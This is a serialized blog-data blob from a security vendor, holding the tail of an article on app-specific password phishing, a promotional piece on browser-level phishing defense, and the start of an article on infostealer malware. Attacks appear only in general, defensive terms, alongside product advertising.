here",{"data":37206,"marks":37207,"value":4630,"nodeType":883},{},[],{"data":37209,"content":37210,"nodeType":879},{},[37211],{"data":37212,"marks":37213,"value":37214,"nodeType":883},{},[],"Clearly, ASP phishing is part of a much bigger trend in which attackers are moving away from conventional phishing tactics in order to sidestep the authentication process. ",{"data":37216,"content":37217,"nodeType":905},{},[],{"data":37219,"content":37220,"nodeType":909},{},[37221],{"data":37222,"marks":37223,"value":1702,"nodeType":883},{},[37224],{"type":916},{"data":37226,"content":37227,"nodeType":879},{},[37228,37232,37240,37244,37251],{"data":37229,"marks":37230,"value":37231,"nodeType":883},{},[],"There is a common misconception that adopting SSO-based logins, with a locked-down IdP account is an identity security silver bullet. The reality is that identity, authentication, and authorization is a complex and little-understood space. Even with SSO, there are ",{"data":37233,"content":37235,"nodeType":940},{"uri":37234},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fghost_logins\u002Fdescription.md",[37236],{"data":37237,"marks":37238,"value":1592,"nodeType":883},{},[37239],{"type":948},{"data":37241,"marks":37242,"value":37243,"nodeType":883},{},[],", backup login and MFA methods susceptible to ",{"data":37245,"content":37246,"nodeType":940},{"uri":35197},[37247],{"data":37248,"marks":37249,"value":1082,"nodeType":883},{},[37250],{"type":948},{"data":37252,"marks":37253,"value":37254,"nodeType":883},{},[],", and as we’ve seen with ASP phishing and similar techniques, many, many more ways to compromise an identity. ",{"data":37256,"content":37257,"nodeType":879},{},[37258],{"data":37259,"marks":37260,"value":37261,"nodeType":883},{},[],"Security teams need to approach the complexity of identity security with their eyes open to reality. Without a full picture of how your various workforce identities can be accessed by your users, exploitable gaps will inevitably be left for attackers to take advantage of. ",{"data":37263,"content":37264,"nodeType":905},{},[],{"data":37266,"content":37267,"nodeType":909},{},[37268],{"data":37269,"marks":37270,"value":37272,"nodeType":883},{},[37271],{"type":916},"Recommendations",{"data":37274,"content":37275,"nodeType":879},{},[37276],{"data":37277,"marks":37278,"value":37279,"nodeType":883},{},[],"Given the logging challenges relating to ASP creation and use, the best option is to prevent ASPs from being created in the first place. ",{"data":37281,"content":37282,"nodeType":879},{},[37283,37287,37296],{"data":37284,"marks":37285,"value":37286,"nodeType":883},{},[],"By default, users can't create app passwords in Microsoft. The app passwords feature must be enabled before users can use them. To check if this option is turned on, ",{"data":37288,"content":37290,"nodeType":940},{"uri":37289},"https:\u002F\u002Flearn.microsoft.com\u002Fen-gb\u002Fentra\u002Fidentity\u002Fauthentication\u002Fhowto-mfa-app-passwords",[37291],{"data":37292,"marks":37293,"value":37295,"nodeType":883},{},[37294],{"type":948},"you can see and toggle the setting in Entra",{"data":37297,"marks":37298,"value":37299,"nodeType":883},{},[]," by browsing to Conditional Access > Named locations > Configure MFA trusted IPs > Multifactor authentication page > Allow users to create app passwords to sign in to non-browser apps option.",{"data":37301,"content":37302,"nodeType":879},{},[37303],{"data":37304,"marks":37305,"value":37306,"nodeType":883},{},[],"Apple and Google ASPs can’t be disabled in the same way… but don’t worry. That’s where Push comes in. ",{"data":37308,"content":37309,"nodeType":905},{},[],{"data":37311,"content":37312,"nodeType":909},{},[37313],{"data":37314,"marks":37315,"value":17585,"nodeType":883},{},[37316],{"type":916},{"data":37318,"content":37319,"nodeType":879},{},[37320],{"data":37321,"marks":37322,"value":37323,"nodeType":883},{},[],"We’re working on adding visibility for ASPs being created, but users of our browser-based security platform can use existing features to prevent ASP phishing. Realistically, there’s no good reason for the average user to be configuring ASPs. So, you can use our URL blocking feature to prevent employees from accessing the pages for ASP creation on relevant apps. ",{"data":37325,"content":37329,"nodeType":971},{"target":37326},{"sys":37327},{"id":37328,"type":976,"linkType":977},"5i0Ou5a27XOt7gxJo9cu0P",[],{"data":37331,"content":37332,"nodeType":879},{},[37333],{"data":37334,"marks":37335,"value":37336,"nodeType":883},{},[],"When a user tries to access the page, they’ll see this message instead and a security alert will be generated. ",{"data":37338,"content":37342,"nodeType":971},{"target":37339},{"sys":37340},{"id":37341,"type":976,"linkType":977},"7nsimiWtv5XOuKkE9wL3A3",[],{"data":37344,"content":37345,"nodeType":879},{},[37346],{"data":37347,"marks":37348,"value":37349,"nodeType":883},{},[],"It is recommended that you block the following URLs for Google and Apple:",{"data":37351,"content":37352,"nodeType":1531},{},[37353,37372],{"data":37354,"content":37355,"nodeType":1535},{},[37356],{"data":37357,"content":37358,"nodeType":879},{},[37359,37362,37369],{"data":37360,"marks":37361,"value":21,"nodeType":883},{},[],{"data":37363,"content":37364,"nodeType":940},{"uri":36889},[37365],{"data":37366,"marks":37367,"value":36895,"nodeType":883},{},[37368],{"type":948},{"data":37370,"marks":37371,"value":21,"nodeType":883},{},[],{"data":37373,"content":37374,"nodeType":1535},{},[37375],{"data":37376,"content":37377,"nodeType":879},{},[37378,37381,37390],{"data":37379,"marks":37380,"value":21,"nodeType":883},{},[],{"data":37382,"content":37384,"nodeType":940},{"uri":37383},"http:\u002F\u002Fappleid.apple.com\u002Faccount\u002Fmanage\u002Fsecurity\u002Fsecondary-password",[37385],{"data":37386,"marks":37387,"value":37389,"nodeType":883},{},[37388],{"type":948},"appleid.apple.com\u002Faccount\u002Fmanage\u002Fsecurity\u002Fsecondary-password",{"data":37391,"marks":37392,"value":21,"nodeType":883},{},[],{"data":37394,"content":37395,"nodeType":879},{},[37396],{"data":37397,"marks":37398,"value":37399,"nodeType":883},{},[],"Unfortunately, there is no specific link to the Microsoft creation page — but as established above, this should not be enabled by default in Microsoft. ",{"data":37401,"content":37402,"nodeType":879},{},[37403],{"data":37404,"marks":37405,"value":37406,"nodeType":883},{},[],"If you encounter any more apps which allow ASPs, you can similarly add the specific ASP creation page to the list of blocked URLs.",{"data":37408,"content":37409,"nodeType":905},{},[],{"data":37411,"content":37412,"nodeType":909},{},[37413],{"data":37414,"marks":37415,"value":37417,"nodeType":883},{},[37416],{"type":916},"Want to learn more about Push?",{"data":37419,"content":37420,"nodeType":879},{},[37421],{"data":37422,"marks":37423,"value":37424,"nodeType":883},{},[],"And that’s not all — Push provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use, like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",{"data":37426,"content":37427,"nodeType":879},{},[37428,37431,37439],{"data":37429,"marks":37430,"value":36370,"nodeType":883},{},[],{"data":37432,"content":37434,"nodeType":940},{"uri":37433},"https:\u002F\u002Fpushsecurity.com\u002F",[37435],{"data":37436,"marks":37437,"value":1751,"nodeType":883},{},[37438],{"type":948},{"data":37440,"marks":37441,"value":1350,"nodeType":883},{},[],"App-Specific Password phishing: another novel way to get around passkeys and MFA","How App-Specific Password phishing is being used in the wild to bypass phishing-resistant authentication controls like passkeys. ","2025-06-26T00:00:00.000Z","app-specific-password-phishing",{"items":37447},[37448,37450],{"sys":37449,"name":3273},{"id":3272},{"sys":37451,"name":343},{"id":3276},{"items":37453},[37454],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":37455},{"url":872},{"__typename":1967,"sys":37457,"content":37459,"title":38075,"synopsis":38076,"hashTags":59,"publishedDate":37444,"slug":38077,"tagsCollection":38078,"authorsCollection":38084},{"id":37458},"XQHcBu5kiSBd6MMwICYI4",{"json":37460},{"data":37461,"content":37462,"nodeType":875},{},[37463,37470,37477,37485,37514,37521,37527,37530,37538,37545,37552,37595,37602,37609,37612,37620,37627,37634,37641,37660,37667,37673,37681,37688,37695,37702,37708,37711,37719,37727,37734,37742,37749,37814,37821,37829,37836,37869,37877,37884,37892,37899,37907,37914,37967,37974,37977,37985,37992,38009,38042,38063,38069],{"data":37464,"content":37465,"nodeType":879},{},[37466],{"data":37467,"marks":37468,"value":37469,"nodeType":883},{},[],"Phishing has undergone a radical transformation. The laughably bad emails and fake PayPal logins of the past have given way to sophisticated campaigns engineered to slip through even the most hardened security stacks. ",{"data":37471,"content":37472,"nodeType":879},{},[37473],{"data":37474,"marks":37475,"value":37476,"nodeType":883},{},[],"Today’s phishing attacks are faster, more adaptable, and harder to catch with traditional tools. Email filters and threat intel still play an important role, but they’re often reacting to threats that are already in motion, and by the time a phishing link is flagged and blocklisted, someone has probably already clicked — and the attacker has moved onto their next set of links.",{"data":37478,"content":37479,"nodeType":879},{},[37480],{"data":37481,"marks":37482,"value":37484,"nodeType":883},{},[37483],{"type":916},"The problem isn’t that phishing has evolved. It’s that our defenses haven’t.",{"data":37486,"content":37487,"nodeType":879},{},[37488,37492,37501,37505,37510],{"data":37489,"marks":37490,"value":37491,"nodeType":883},{},[],"That’s where ",{"data":37493,"content":37495,"nodeType":940},{"uri":37494},"https:\u002F\u002Fpushsecurity.com\u002Fuc\u002Fzero-day-phishing-protection",[37496],{"data":37497,"marks":37498,"value":37500,"nodeType":883},{},[37499],{"type":948},"Push Security",{"data":37502,"marks":37503,"value":37504,"nodeType":883},{},[]," comes in. By embedding real-time detection directly into the browser, the very place where phishing attacks unfold, Push offers a fundamentally new way to stop phishing: ",{"data":37506,"marks":37507,"value":37509,"nodeType":883},{},[37508],{"type":891},"as it happens",{"data":37511,"marks":37512,"value":37513,"nodeType":883},{},[],", regardless of whether or not the exact attack has ever been seen before. ",{"data":37515,"content":37516,"nodeType":879},{},[37517],{"data":37518,"marks":37519,"value":37520,"nodeType":883},{},[],"Check out the video to see how it works. ",{"data":37522,"content":37526,"nodeType":971},{"target":37523},{"sys":37524},{"id":37525,"type":976,"linkType":977},"4LaKobadjp19jjocLXcW4E",[],{"data":37528,"content":37529,"nodeType":905},{},[],{"data":37531,"content":37532,"nodeType":909},{},[37533],{"data":37534,"marks":37535,"value":37537,"nodeType":883},{},[37536],{"type":916},"The modern phishing playground",{"data":37539,"content":37540,"nodeType":879},{},[37541],{"data":37542,"marks":37543,"value":37544,"nodeType":883},{},[],"Phishing attacks today look nothing like the blunt instruments of a few years ago. These are fast, customized, and often completely ephemeral. A phishing domain might go live at 9 a.m., compromise scores of credentials, and be gone before lunch, long before it ever hits a threat intel feed.",{"data":37546,"content":37547,"nodeType":879},{},[37548],{"data":37549,"marks":37550,"value":37551,"nodeType":883},{},[],"Modern attackers use:",{"data":37553,"content":37554,"nodeType":1531},{},[37555,37565,37575,37585],{"data":37556,"content":37557,"nodeType":1535},{},[37558],{"data":37559,"content":37560,"nodeType":879},{},[37561],{"data":37562,"marks":37563,"value":37564,"nodeType":883},{},[],"Dynamic content and user-adaptive emails that can be easily changed based on the target’s identity and environment.",{"data":37566,"content":37567,"nodeType":1535},{},[37568],{"data":37569,"content":37570,"nodeType":879},{},[37571],{"data":37572,"marks":37573,"value":37574,"nodeType":883},{},[],"Obfuscated URLs hidden behind trusted services (like Google Sites), making reputation analysis less than reliable.",{"data":37576,"content":37577,"nodeType":1535},{},[37578],{"data":37579,"content":37580,"nodeType":879},{},[37581],{"data":37582,"marks":37583,"value":37584,"nodeType":883},{},[],"Real-time proxying tools to clone login flows and harvest credentials.",{"data":37586,"content":37587,"nodeType":1535},{},[37588],{"data":37589,"content":37590,"nodeType":879},{},[37591],{"data":37592,"marks":37593,"value":37594,"nodeType":883},{},[],"Rapid-fire infrastructure rotation, making the attack’s infrastructure almost impossible to track in time.",{"data":37596,"content":37597,"nodeType":879},{},[37598],{"data":37599,"marks":37600,"value":37601,"nodeType":883},{},[],"These attacks often bypass traditional defenses entirely, not because the tools are broken, but because they were designed for a different era, one where phishing pages lived for days or weeks, not minutes.",{"data":37603,"content":37604,"nodeType":879},{},[37605],{"data":37606,"marks":37607,"value":37608,"nodeType":883},{},[],"It’s not enough to know what was bad yesterday. You need to know what’s happening now.",{"data":37610,"content":37611,"nodeType":905},{},[],{"data":37613,"content":37614,"nodeType":909},{},[37615],{"data":37616,"marks":37617,"value":37619,"nodeType":883},{},[37618],{"type":916},"Why blocklists and perimeter defenses are falling behind",{"data":37621,"content":37622,"nodeType":879},{},[37623],{"data":37624,"marks":37625,"value":37626,"nodeType":883},{},[],"The security ecosystem has long depended on reputation-based systems: block the known bad, allow the rest. That worked when attackers reused infrastructure and relied on mass campaigns. Today’s adversaries have adapted.",{"data":37628,"content":37629,"nodeType":879},{},[37630],{"data":37631,"marks":37632,"value":37633,"nodeType":883},{},[],"Consider a scenario similar to the one from our video:",{"data":37635,"content":37636,"nodeType":879},{},[37637],{"data":37638,"marks":37639,"value":37640,"nodeType":883},{},[],"A staff member receives an email appearing to be from Microsoft Teams. It includes dynamic content that mirrors their actual environment, including their username, company logo, and real collaboration data. The embedded link takes them to a cloned Microsoft login page hosted on a benign-looking subdomain. The site is brand new. It’s not on any blocklist. Your email filter passes it. The employee logs in. Credentials and session tokens? Gone.",{"data":37642,"content":37643,"nodeType":879},{},[37644,37648,37656],{"data":37645,"marks":37646,"value":37647,"nodeType":883},{},[],"And that’s just step one. The attacker now pivots to connected apps like ",{"data":37649,"content":37650,"nodeType":940},{"uri":17485},[37651],{"data":37652,"marks":37653,"value":37655,"nodeType":883},{},[37654],{"type":948},"Jira",{"data":37657,"marks":37658,"value":37659,"nodeType":883},{},[],", Confluence, or AWS, moving laterally through your cloud environment using the compromised credentials.",{"data":37661,"content":37662,"nodeType":879},{},[37663],{"data":37664,"marks":37665,"value":37666,"nodeType":883},{},[],"Traditional tools often miss these threats not due to a lack of sophistication, but because they’re looking from the outside in. The browser is where the attack actually unfolds. Without visibility there, key indicators of compromise go undetected.",{"data":37668,"content":37672,"nodeType":971},{"target":37669},{"sys":37670},{"id":37671,"type":976,"linkType":977},"1UGu43QxCiYofkeGtOMp5J",[],{"data":37674,"content":37675,"nodeType":909},{},[37676],{"data":37677,"marks":37678,"value":37680,"nodeType":883},{},[37679],{"type":916},"Rethinking where phishing defense happens",{"data":37682,"content":37683,"nodeType":879},{},[37684],{"data":37685,"marks":37686,"value":37687,"nodeType":883},{},[],"Push changes where phishing protection happens, from upstream detection to point-of-interaction control. Instead of chasing malicious links through email gateways or external threat feeds, Push embeds lightweight, always-on protection directly, as users go about their work in the browser.",{"data":37689,"content":37690,"nodeType":879},{},[37691],{"data":37692,"marks":37693,"value":37694,"nodeType":883},{},[],"Push monitors what’s happening in each session: how pages are built, how they behave, and how users interact with them. That means it can recognize when a login prompt doesn’t match your identity provider or when a script behaves like part of a phishing toolkit.",{"data":37696,"content":37697,"nodeType":879},{},[37698],{"data":37699,"marks":37700,"value":37701,"nodeType":883},{},[],"When Push identifies something suspicious, it takes action right away. Logins are interrupted before any data is exposed. Users get clear guidance in-browser. And security teams receive detailed telemetry that shows exactly what happened, who was targeted, and how the threat was stopped.",{"data":37703,"content":37707,"nodeType":971},{"target":37704},{"sys":37705},{"id":37706,"type":976,"linkType":977},"7Hu3kypFWwJAGOuQp0kYmU",[],{"data":37709,"content":37710,"nodeType":905},{},[],{"data":37712,"content":37713,"nodeType":909},{},[37714],{"data":37715,"marks":37716,"value":37718,"nodeType":883},{},[37717],{"type":916},"The benefits of browser-native phishing defense",{"data":37720,"content":37721,"nodeType":1036},{},[37722],{"data":37723,"marks":37724,"value":37726,"nodeType":883},{},[37725],{"type":916},"True zero-day protection",{"data":37728,"content":37729,"nodeType":879},{},[37730],{"data":37731,"marks":37732,"value":37733,"nodeType":883},{},[],"Push doesn’t rely on known indicators of compromise. It evaluates the actual behavior and context of every session in real-time. Whether the phishing site was created 5 months ago or 5 minutes ago is irrelevant — Push detects it and shuts it down.",{"data":37735,"content":37736,"nodeType":1036},{},[37737],{"data":37738,"marks":37739,"value":37741,"nodeType":883},{},[37740],{"type":916},"Contextual threat detection",{"data":37743,"content":37744,"nodeType":879},{},[37745],{"data":37746,"marks":37747,"value":37748,"nodeType":883},{},[],"Because Push operates in the browser, it sees everything:",{"data":37750,"content":37751,"nodeType":1531},{},[37752,37762,37772,37794,37804],{"data":37753,"content":37754,"nodeType":1535},{},[37755],{"data":37756,"content":37757,"nodeType":879},{},[37758],{"data":37759,"marks":37760,"value":37761,"nodeType":883},{},[],"The page layout",{"data":37763,"content":37764,"nodeType":1535},{},[37765],{"data":37766,"content":37767,"nodeType":879},{},[37768],{"data":37769,"marks":37770,"value":37771,"nodeType":883},{},[],"Where the user came from",{"data":37773,"content":37774,"nodeType":1535},{},[37775],{"data":37776,"content":37777,"nodeType":879},{},[37778,37782,37791],{"data":37779,"marks":37780,"value":37781,"nodeType":883},{},[],"The password they enter ",{"data":37783,"content":37785,"nodeType":940},{"uri":37784},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002F10043\u002F#how-push-securely-analyzes-passwords",[37786],{"data":37787,"marks":37788,"value":37790,"nodeType":883},{},[37789],{"type":948},"(as a salted, abbreviated hash)",{"data":37792,"marks":37793,"value":21,"nodeType":883},{},[],{"data":37795,"content":37796,"nodeType":1535},{},[37797],{"data":37798,"content":37799,"nodeType":879},{},[37800],{"data":37801,"marks":37802,"value":37803,"nodeType":883},{},[],"What scripts are running",{"data":37805,"content":37806,"nodeType":1535},{},[37807],{"data":37808,"content":37809,"nodeType":879},{},[37810],{"data":37811,"marks":37812,"value":37813,"nodeType":883},{},[],"And where credentials are being sent",{"data":37815,"content":37816,"nodeType":879},{},[37817],{"data":37818,"marks":37819,"value":37820,"nodeType":883},{},[],"This context enables Push to stop even well-camouflaged phishing attempts, including AitM attacks that bypass MFA.",{"data":37822,"content":37823,"nodeType":1036},{},[37824],{"data":37825,"marks":37826,"value":37828,"nodeType":883},{},[37827],{"type":916},"Real-time interception of malicious activity",{"data":37830,"content":37831,"nodeType":879},{},[37832],{"data":37833,"marks":37834,"value":37835,"nodeType":883},{},[],"As soon as a phishing attempt is confirmed, the response is immediate:",{"data":37837,"content":37838,"nodeType":1531},{},[37839,37849,37859],{"data":37840,"content":37841,"nodeType":1535},{},[37842],{"data":37843,"content":37844,"nodeType":879},{},[37845],{"data":37846,"marks":37847,"value":37848,"nodeType":883},{},[],"Credential entry is halted.",{"data":37850,"content":37851,"nodeType":1535},{},[37852],{"data":37853,"content":37854,"nodeType":879},{},[37855],{"data":37856,"marks":37857,"value":37858,"nodeType":883},{},[],"Sessions are revoked.",{"data":37860,"content":37861,"nodeType":1535},{},[37862],{"data":37863,"content":37864,"nodeType":879},{},[37865],{"data":37866,"marks":37867,"value":37868,"nodeType":883},{},[],"The user is protected without delay.",{"data":37870,"content":37871,"nodeType":1036},{},[37872],{"data":37873,"marks":37874,"value":37876,"nodeType":883},{},[37875],{"type":916},"Reduced incident response overhead",{"data":37878,"content":37879,"nodeType":879},{},[37880],{"data":37881,"marks":37882,"value":37883,"nodeType":883},{},[],"Most phishing attacks end in hours of IR and expensive cleanup. With Push, attacks don’t escalate beyond the initial click. That means fewer compromised accounts, fewer escalations, and less fatigue on your security team.",{"data":37885,"content":37886,"nodeType":1036},{},[37887],{"data":37888,"marks":37889,"value":37891,"nodeType":883},{},[37890],{"type":916},"Empowered, educated users",{"data":37893,"content":37894,"nodeType":879},{},[37895],{"data":37896,"marks":37897,"value":37898,"nodeType":883},{},[],"Push doesn’t just block phishing; it helps users learn from it. When someone interacts with a suspicious page, they get clear, actionable feedback right in the browser. Over time, these in-the-moment cues help build stronger phishing awareness across your workforce. Employee-facing messages are fully customizable to match the tone and style of your organization.",{"data":37900,"content":37901,"nodeType":1036},{},[37902],{"data":37903,"marks":37904,"value":37906,"nodeType":883},{},[37905],{"type":916},"A new paradigm for identity security",{"data":37908,"content":37909,"nodeType":879},{},[37910],{"data":37911,"marks":37912,"value":37913,"nodeType":883},{},[],"While phishing detection is core, Push also helps you defend your entire browser-based identity attack surface. That means protecting against other common forms of account compromise, like:",{"data":37915,"content":37916,"nodeType":1531},{},[37917,37927,37937,37947,37957],{"data":37918,"content":37919,"nodeType":1535},{},[37920],{"data":37921,"content":37922,"nodeType":879},{},[37923],{"data":37924,"marks":37925,"value":37926,"nodeType":883},{},[],"Employees using breached or reused passwords",{"data":37928,"content":37929,"nodeType":1535},{},[37930],{"data":37931,"content":37932,"nodeType":879},{},[37933],{"data":37934,"marks":37935,"value":37936,"nodeType":883},{},[],"Missing or misconfigured MFA",{"data":37938,"content":37939,"nodeType":1535},{},[37940],{"data":37941,"content":37942,"nodeType":879},{},[37943],{"data":37944,"marks":37945,"value":37946,"nodeType":883},{},[],"Ghost logins that bypass your identity provider",{"data":37948,"content":37949,"nodeType":1535},{},[37950],{"data":37951,"content":37952,"nodeType":879},{},[37953],{"data":37954,"marks":37955,"value":37956,"nodeType":883},{},[],"Token-based session hijacking",{"data":37958,"content":37959,"nodeType":1535},{},[37960],{"data":37961,"content":37962,"nodeType":879},{},[37963],{"data":37964,"marks":37965,"value":37966,"nodeType":883},{},[],"Shadow SaaS usage",{"data":37968,"content":37969,"nodeType":879},{},[37970],{"data":37971,"marks":37972,"value":37973,"nodeType":883},{},[],"Because Push runs directly in the browser, it gives you visibility across every app your employees access, whether it’s officially managed or not. And it doesn’t just alert, it actively helps you fix the issues, guiding users to take action when risks are found.",{"data":37975,"content":37976,"nodeType":905},{},[],{"data":37978,"content":37979,"nodeType":909},{},[37980],{"data":37981,"marks":37982,"value":37984,"nodeType":883},{},[37983],{"type":916},"Modern phishing requires a modern defense",{"data":37986,"content":37987,"nodeType":879},{},[37988],{"data":37989,"marks":37990,"value":37991,"nodeType":883},{},[],"Phishing is no longer an email problem. It’s not even just a domain reputation problem. It’s an identity attack problem, and the only place you can see those attacks in action is inside the browser.",{"data":37993,"content":37994,"nodeType":879},{},[37995,37999,38006],{"data":37996,"marks":37997,"value":37998,"nodeType":883},{},[],"Push Security gives you a new advantage: proactive, in-browser protection against modern phishing campaigns — ",{"data":38000,"content":38001,"nodeType":940},{"uri":37494},[38002],{"data":38003,"marks":38004,"value":38005,"nodeType":883},{},[],"even those with never-before-seen phishing sites",{"data":38007,"marks":38008,"value":1350,"nodeType":883},{},[],{"data":38010,"content":38011,"nodeType":1531},{},[38012,38022,38032],{"data":38013,"content":38014,"nodeType":1535},{},[38015],{"data":38016,"content":38017,"nodeType":879},{},[38018],{"data":38019,"marks":38020,"value":38021,"nodeType":883},{},[],"See the phish happen.",{"data":38023,"content":38024,"nodeType":1535},{},[38025],{"data":38026,"content":38027,"nodeType":879},{},[38028],{"data":38029,"marks":38030,"value":38031,"nodeType":883},{},[],"Stop it in real time.",{"data":38033,"content":38034,"nodeType":1535},{},[38035],{"data":38036,"content":38037,"nodeType":879},{},[38038],{"data":38039,"marks":38040,"value":38041,"nodeType":883},{},[],"Keep your workforce identities safe.",{"data":38043,"content":38044,"nodeType":879},{},[38045,38050,38058],{"data":38046,"marks":38047,"value":38049,"nodeType":883},{},[38048],{"type":916},"Want to see Push in action? ",{"data":38051,"content":38052,"nodeType":940},{"uri":3254},[38053],{"data":38054,"marks":38055,"value":38057,"nodeType":883},{},[38056],{"type":916},"Book a demo",{"data":38059,"marks":38060,"value":38062,"nodeType":883},{},[38061],{"type":916}," and watch a real-time phishing attack get stopped mid-flow.",{"data":38064,"content":38068,"nodeType":971},{"target":38065},{"sys":38066},{"id":38067,"type":976,"linkType":977},"7eSsPjEj178j3ViloaChbQ",[],{"data":38070,"content":38071,"nodeType":879},{},[38072],{"data":38073,"marks":38074,"value":21,"nodeType":883},{},[],"How browser-level controls change the fight against phishing","Attackers are routinely defeating conventional email, network, and endpoint-based security controls. Here's how browser controls can level the playing field.","how-browser-level-controls-change-the-fight-against-phishing",{"items":38079},[38080,38082],{"sys":38081,"name":3273},{"id":3272},{"sys":38083,"name":343},{"id":3276},{"items":38085},[38086],{"fullName":38087,"firstName":38088,"jobTitle":4799,"profilePicture":38089},"Peyton Padfield","Peyton",{"url":38090},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1GU01HXElmc07nwi89qP3b\u002F3188050420106c62e9df2ed4e4893b7f\u002F1677005177901__1_.jpeg","detecting-phishing-pages-using-obfuscated-url-destinations","blog\u002Fdetecting-phishing-pages-using-obfuscated-url-destinations",{"json":38094},{"data":38095,"content":38096,"nodeType":875},{},[38097],{"data":38098,"content":38099,"nodeType":879},{},[38100],{"data":38101,"marks":38102,"value":38103,"nodeType":883},{},[],"Push now blocks URL schema obfuscation, countering a common technique used by attackers to bypass URL detections for phishing pages and malicious IPs. ",{"id":38105,"publishedAt":38106},"01j2aaSivfQJ2n8Dt6H8yO","2026-08-12T11:53:59.638Z",{"items":38108},[38109,38111],{"sys":38110,"name":3273},{"id":3272},{"sys":38112,"name":343},{"id":3276},{"items":38114},[38115,38117,38119,38121,38123,38125],{"sys":38116,"name":280,"slug":281,"tier":31},{"id":277},{"sys":38118,"name":521,"slug":522,"tier":31},{"id":518},{"sys":38120,"name":343,"slug":344,"tier":31},{"id":340},{"sys":38122,"name":325,"slug":326,"tier":45},{"id":322},{"sys":38124,"name":352,"slug":353,"tier":45},{"id":349},{"sys":38126,"name":450,"slug":451,"tier":45},{"id":447},"pEuvd4s4OBm73TH6Tk9nGVRiXOUBztKA0iDSOXkaHqE",{"id":38129,"title":38130,"authorsCollection":38131,"content":38136,"extension":228,"faqItemsCollection":39315,"faqTitle":59,"featured":6,"hashTags":59,"meta":39317,"metaTitle":39318,"ogImage":59,"postType":8981,"publishedDate":39319,"relatedBlogPostsCollection":39320,"slug":41246,"stem":41247,"subtitle":59,"summary":41248,"synopsis":41259,"sys":41260,"tagsCollection":41263,"topicsCollection":41269,"__hash__":41309},"blog\u002Fblog\u002Fwhat-the-rise-of-infostealers-says-about-identity-attacks.json","What the rise of infostealers says about identity attacks",{"items":38132},[38133],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":38134,"profilePicture":38135},[870],{"url":872},{"json":38137,"links":39290},{"data":38138,"content":38139,"nodeType":875},{},[38140,38172,38184,38200,38207,38214,38217,38224,38231,38363,38370,38377,38471,38478,38485,38538,38545,38568,38625,38628,38635,38654,38674,38681,38700,38707,38719,38722,38729,38736,38784,38791,38798,38817,38820,38827,38834,38841,38860,38867,38874,38881,38901,38908,38915,38922,38929,38948,38955,38962,38969,38976,39008,39014,39017,39024,39031,39037,39044,39051,39074,39081,39088,39131,39147,39167,39173,39180,39187,39194,39226,39271,39278,39284],{"data":38141,"content":38142,"nodeType":879},{},[38143,38147,38156,38160,38168],{"data":38144,"marks":38145,"value":38146,"nodeType":883},{},[],"Infostealer malware seems to be grabbing the headlines right now. It’s easy to see why, too, after laying claim to one of the ",{"data":38148,"content":38150,"nodeType":940},{"uri":38149},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Fsnowflake-breach-advanced-auto-parts-lendingtree\u002F",[38151],{"data":38152,"marks":38153,"value":38155,"nodeType":883},{},[38154],{"type":948},"biggest breaches in history",{"data":38157,"marks":38158,"value":38159,"nodeType":883},{},[],". The ",{"data":38161,"content":38162,"nodeType":940},{"uri":7680},[38163],{"data":38164,"marks":38165,"value":38167,"nodeType":883},{},[38166],{"type":948},"recent attacks on Snowflake customers",{"data":38169,"marks":38170,"value":38171,"nodeType":883},{},[]," saw ~165 businesses compromised using stolen credentials, resulting in millions of breached customer records, with the full impact still emerging. ",{"data":38173,"content":38174,"nodeType":879},{},[38175,38179],{"data":38176,"marks":38177,"value":38178,"nodeType":883},{},[],"Notably, ",{"data":38180,"marks":38181,"value":38183,"nodeType":883},{},[38182],{"type":916},"80% of the credentials used to access Snowflake customer accounts had found their way online after being stolen in infostealer infections – dating back as early as 2020. ",{"data":38185,"content":38186,"nodeType":879},{},[38187,38191,38196],{"data":38188,"marks":38189,"value":38190,"nodeType":883},{},[],"The Snowflake situation is a reminder of how lucrative stolen credentials can be for attackers – and how the cybercrime ecosystem has tilted as a result. As the saying goes nowadays, ",{"data":38192,"marks":38193,"value":38195,"nodeType":883},{},[38194],{"type":916},"hackers don’t hack in, they log in",{"data":38197,"marks":38198,"value":38199,"nodeType":883},{},[],". Stolen credentials are the lowest hanging fruit available to attackers, and their appetite (and the ecosystem needed to feed it) is insatiable. As an attacker, the prospect of picking up access to a major enterprise for just $10 or less (or even for free) is hard to resist – why wouldn’t you buy a ticket and take the gamble?  ",{"data":38201,"content":38202,"nodeType":879},{},[38203],{"data":38204,"marks":38205,"value":38206,"nodeType":883},{},[],"Infostealers are a huge part of the shift toward identity attacks. Along with phishing, infostealers are the primary mechanism for attackers to harvest credentials. Unlike phishing, infostealers can collect a large number of credentials (and other helpful data saved in the browser) in one fell swoop. But, they do have limitations. For example, you would expect any credible EDR to detect and block these attacks. And yet, the success of the attacks on Snowflake customers show us that gaps are being found and exploited.  ",{"data":38208,"content":38209,"nodeType":879},{},[38210],{"data":38211,"marks":38212,"value":38213,"nodeType":883},{},[],"In this article, we’ll look at the history of infostealers, how they work, and what the trends show us about how the cybercrime ecosystem is leaning into the opportunity they present.    ",{"data":38215,"content":38216,"nodeType":905},{},[],{"data":38218,"content":38219,"nodeType":909},{},[38220],{"data":38221,"marks":38222,"value":38223,"nodeType":883},{},[],"The state of infostealers today",{"data":38225,"content":38226,"nodeType":879},{},[38227],{"data":38228,"marks":38229,"value":38230,"nodeType":883},{},[],"Infostealers, and the mass credential harvesting they enable, are a big part of the rise in identity attacks. The stats support this, as:",{"data":38232,"content":38233,"nodeType":1531},{},[38234,38256,38278,38299,38321,38342],{"data":38235,"content":38236,"nodeType":1535},{},[38237],{"data":38238,"content":38239,"nodeType":879},{},[38240,38244,38253],{"data":38241,"marks":38242,"value":38243,"nodeType":883},{},[],"One million new stealer logs are distributed every month, with an estimated 3-5% containing credentials and session cookies to corporate IT environments 